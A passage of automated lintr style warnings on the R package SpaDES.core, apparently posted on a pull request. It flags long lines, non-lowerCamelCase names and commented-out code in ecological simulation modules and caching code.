.last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"startTime\", \"numeric\", start(sim) + 1, 0, end(sim), \"time of initial fire ignition\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), end(sim) + 1, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:42:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L42) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:59:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L59) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.fireSpread <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:87:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L87) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim), \"fireSpread\", \"stats\") # do stats immediately following burn\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:142:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L142) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:146:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L146) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- raster(extent(landscapes), ncol = ncol(landscapes),\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:150:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L150) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- setValues(Fires, 0)\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:153:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L153) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:159:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L159) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Burn <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:162:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L162) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Fires <- spread(landscapes[[1]],\n  ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:174:14:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L174) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  landscapes$Fires <- Fires\n             ^~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:181:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/fireSpread/fireSpread.R#L181) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Stats <- function(sim) {\n^~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/randomLandscapes/randomLandscapes.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:33:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/randomLandscapes/randomLandscapes.R#L33) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"inRAM\", \"logical\", FALSE, TRUE, FALSE, \"should the raster be stored in memory?\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:34:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/randomLandscapes/randomLandscapes.R#L34) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"nx\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the x dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/randomLandscapes/randomLandscapes.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"ny\", \"numeric\", 100L, 10L, 500L, \"size of map (number of pixels) in the y dimension\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/randomLandscapes/randomLandscapes.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", start(sim), start(sim), NA, \"time to schedule first plot event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:38:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/randomLandscapes/randomLandscapes.R#L38) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between plot events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:39:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/randomLandscapes/randomLandscapes.R#L39) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"time to schedule first save event\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:40:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/randomLandscapes/randomLandscapes.R#L40) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInterval\", \"numeric\", NA_real_, NA, NA, \"time interval between save events\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:41:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/randomLandscapes/randomLandscapes.R#L41) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".useCache\", \"logical\", FALSE, c(\"init\", \"plot\"), NA, \"should the module result be cached for future use\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:55:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/randomLandscapes/randomLandscapes.R#L55) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.randomLandscapes <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:75:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/randomLandscapes/randomLandscapes.R#L75) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"randomLandscapes\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/randomLandscapes/randomLandscapes.R#L86) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/randomLandscapes/randomLandscapes.R:100:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/randomLandscapes/randomLandscapes.R#L100) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DEM <- gaussMap(template, scale = 300, var = 0.03, speedup = speedup, inMemory = inMemory)\n    ^~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:17:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L17) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".plotInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first plot event should occur\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R:18:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/inst/sampleModules/SpaDES_sampleModules/SpaDES_sampleModules.R#L18) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\".saveInitialTime\", \"numeric\", NA_real_, NA, NA, \"This describes the simulation time at which the first save event should occur\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:231:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L231) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$moduleName, \"module\\n\"))\n                                                 ^\n```\n[R/cache.R:242:50:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L242) *style:* **Commas should always have a space after.**\n```r\n​          cat(crayon::blue(\"  Using \", fromWhere,\" copy of\", cur$eventType, \"event in\",\n                                                 ^\n```\n[R/cache.R:289:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L289) *style:* **Commented code should be removed.**\n```r\n​        #checkPath(cacheRepo, create = TRUE) #SpaDES dependency\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:413:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L413) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #   makes soft copy of all objects, i.e., they have the identical objects, which are pointers only\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:441:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L441) *style:* **Lines should not be more than 100 characters.**\n```r\n​        list2env(mget(lsObjectEnv[lsObjectEnv %in% createOutputs | lsObjectEnv %in% expectsInputs], envir = object@.envir), envir = object2@.envir)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:451:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L451) *style:* **Commented code should be removed.**\n```r\n​          #object2@events <- unique(rbindlist(list(object@events, object2@events)))\n           ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:455:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L455) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # This is for objects that are not in the return environment yet because they are unrelated to the\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:468:10:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L468) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​      for(atts in attrsToGrab) {\n         ^\n```\n[R/cache.R:472:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L472) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"tags\") <- attr(object, \"tags\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:473:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L473) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"call\") <- attr(object, \"call\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:474:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L474) *style:* **Commented code should be removed.**\n```r\n​      # attr(object2, \"function\") <- attr(object, \"function\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:507:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L507) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  setGeneric(\".addTagsToOutput\", function(object, outputObjects, FUN) {\n                                                                 ^~~\n```\n[R/cache.R:530:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L530) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(object, outputObjects, FUN, preDigestByClass) {\n                                               ^~~\n```\n[R/cache.R:622:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L622) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​objSize.simList <- function(x, quick = getOption(\"reproducible.quick\", FALSE)) {\n^~~~~~~~~~~~~~~\n```\n[R/cache.R:649:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L649) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​makeMemoiseable.simList <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/cache.R:657:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/cache.R#L657) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​unmakeMemoiseable.simList_ <- function(x) {\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/checkpoint.R:36:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/checkpoint.R#L36) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.checkpoint <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​                xAsCall <- .isLastLineSim(x = x, xAsString = bb[seq(funStarts[yy], funEnds[yy + 1])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:90:16:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L90) *style:* **Commented code should be removed.**\n```r\n​              #y = strsplit(bb[funStarts[yy]], split = \"\\\\s+\")[[1]][1]\n               ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:91:53:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L91) *style:* **Commas should always have a space after.**\n```r\n​              y <- paste0(cantCodeCheckMessage, \"'\",bb[funStarts[yy]], \"'\")\n                                                    ^\n```\n[R/code-checking.R:144:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L144) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​    if (identical(type, \"returnSim\")) { # This is intended for only the last line of a function\n                                      ^\n```\n[R/code-checking.R:182:48:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L182) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      } else if (identical(x[[1]], quote(`<-`)) ) {\n                                               ^\n```\n[R/code-checking.R:185:62:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L185) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​            if (any(grepl(x[[2]][[2]], pattern = \".envir\"))) {# i.e., sim@.envir\n                                                             ^\n```\n[R/code-checking.R:202:19:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L202) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x <- x[-(1:2)]\n                  ^\n```\n[R/code-checking.R:218:29:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L218) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​          x[[2]] <- x[[2]][-(1:2)]\n                            ^\n```\n[R/code-checking.R:286:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L286) *style:* **Lines should not be more than 100 characters.**\n```r\n​  allChecks <- list(simAssigns = simAssigns, simGets = simGets, returnsSim = returnsSim, assignToSim = assignToSim, fg = fg)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/code-checking.R:319:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/10c64dd848612388f7a9f71359233601b058fc68/R/code-checking.R#L319) *style:* **Lines should not be more than 100 characters.**\n```r\n​    allChecks[anyCantCodeCheck] <- lapply(names(cantCodeCheck[anyCantCodeCheck]), function(objName) 